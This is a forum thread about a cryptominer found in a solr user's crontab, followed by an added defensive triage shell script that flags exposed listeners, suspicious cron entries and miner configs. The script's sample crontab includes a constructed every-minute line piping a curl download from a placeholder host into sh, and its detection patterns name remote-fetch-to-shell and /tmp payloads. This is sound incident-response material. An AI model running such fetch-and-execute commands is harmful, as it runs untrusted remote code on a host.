Crypto miner got on my server - but how?

Hi,

We noticed that the server was running at super high CPU loads (almost 800%, on a 32gb Linode with 8 cores). After some digging we found it was a crypto miner. We think we have got rid of it - BUT how could they have got in? Our passwords are 30+ characters long and a mix of letters, digits, and other special characters, so I'm pretty sure they didn't get in with a brute force. We also have fail2ban setup.

Are there any other ways they could have got in?

They installed a cron as the solr user:

…and this creates a mining profile with wc.conf that has stuff like:

```json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
```

Does anyone have any insight on where we could look? We are going to rebuild the server to make sure that no backdoors are left in, but I'm a bit concerned the original entry point could still be unprotected if we don't know what caused it :(

TIA

Andy

2 Replies

Is your Solr public facing for some reason? It should just listen to localhost, nothing else.

Hi Woet,

Thanks for the reply. Solr itself isn't, but I can access it by adding the IP into my local IP (so I can get into the admin area). It's also locked down by an IP block.

It looks like his other server was also compromised. Same hack, but in a different folder. The other server doesn't have solr on (it was running as gcc).

Thanks

Andy
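Two things in this thread point at where to look: Andy's question of where the entry point could be, and Woet's point that Solr should only ever listen on localhost. The script below is an added triage helper, not something posted in the thread. It has three small stdin filters: one that lists listening sockets bound to anything other than loopback (a Solr/Java socket on `0.0.0.0` or `*` shows up here), one that flags crontab lines with the usual miner hallmarks (remote fetch piped into a shell, payloads under `/tmp` or `/dev/shm`, inline base64 decoding, every-minute schedules), and one that tests whether a config file looks like an xmrig-style miner profile using the keys visible in the posted wc.conf fragment. It assumes iproute2 `ss` and a Vixie-style `crontab -l -u USER` for `--live` mode; the `donate-level`, `pools` and `threads` keys are assumed xmrig keys, and every sample input is constructed.

```shell
#!/bin/sh
# Added post-incident triage helper (not from the original thread).
# Three small filters read text on stdin so they can be run against live
# command output or against copies saved from the compromised host.
# Assumptions: iproute2 `ss` and a Vixie-style `crontab -l -u USER`
# (needs root) when run with --live. All sample data below is constructed.
set -eu

# 1. Listening TCP sockets reachable from outside the host.
#    Input: `ss -Hltnp` (no header); column 4 is the local address:port,
#    column 6 the owning process. Loopback-only binds are dropped.
exposed_listeners() {
    awk '{
        addr = $4
        host = addr
        sub(/:[0-9]+$/, "", host)          # strip the port
        if (host == "127.0.0.1" || host == "[::1]") next
        proc = (NF >= 6) ? $6 : "-"
        print addr, proc
    }'
}

# 2. Crontab lines worth a second look. Pure heuristics: remote fetch piped
#    into a shell, payloads under /tmp or /dev/shm, inline base64 decoding,
#    or an every-minute schedule (typical miner "keep-alive" entries).
#    Output keeps the crontab line number via grep -n; no match is not an error.
suspicious_cron() {
    grep -nE '(curl|wget)[^|;]*[|][[:space:]]*(ba)?sh|/tmp/|/dev/shm/|base64[[:space:]]+(-d|--decode)|^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*' || true
}

# 3. Does a config file look like an xmrig-style miner profile?
#    "algo", "av" and "cpu-affinity" are keys visible in the thread's wc.conf;
#    "donate-level", "pools" and "threads" are assumed xmrig keys.
#    Returns 0 (true) when "algo" plus at least one other key is present.
looks_like_miner_config() {
    conf=$(cat)
    printf '%s\n' "$conf" | grep -qE '"algo"[[:space:]]*:' &&
    printf '%s\n' "$conf" | grep -qE '"(cpu-affinity|av|donate-level|pools?|threads)"[[:space:]]*:'
}

# Constructed sample data standing in for `ss -Hltnp`, `crontab -l` and wc.conf.
SAMPLE_SS='LISTEN 0 128 127.0.0.1:8983 0.0.0.0:* users:(("java",pid=1234,fd=5))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=800,fd=3))
LISTEN 0 128 *:8983 *:* users:(("java",pid=1234,fd=6))
LISTEN 0 128 [::1]:25 [::]:* users:(("master",pid=900,fd=13))'

SAMPLE_CRON='# constructed sample crontab for a service account
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://example.invalid/x.sh | sh
*/5 * * * * /tmp/.x/run >/dev/null 2>&1'

SAMPLE_CONF='{
"algo": "cryptonight",
"av": 0,
"background": true,
"cpu-affinity": null
}'

echo "== non-loopback listeners (sample) =="
printf '%s\n' "$SAMPLE_SS" | exposed_listeners
echo "== suspicious crontab lines (sample) =="
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron
if printf '%s\n' "$SAMPLE_CONF" | looks_like_miner_config; then
    echo "wc.conf sample: looks like a miner profile"
fi

# Same checks against the live host (root needed to read other users' crontabs,
# including service accounts such as solr).
if [ "${1:-}" = "--live" ]; then
    echo "== non-loopback listeners =="
    ss -Hltnp | exposed_listeners
    echo "== suspicious crontab lines =="
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | suspicious_cron | sed "s/^/$u: /"
    done
fi
```

Run it with no arguments to see the filters on the constructed samples, or as root with `--live` on the rebuilt server; a Solr listener should only ever appear in the first section if it is bound to something other than 127.0.0.1, which is exactly the case Woet is warning about. The crontab patterns are heuristics, so treat a hit as a prompt to read the entry, not as proof of compromise.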
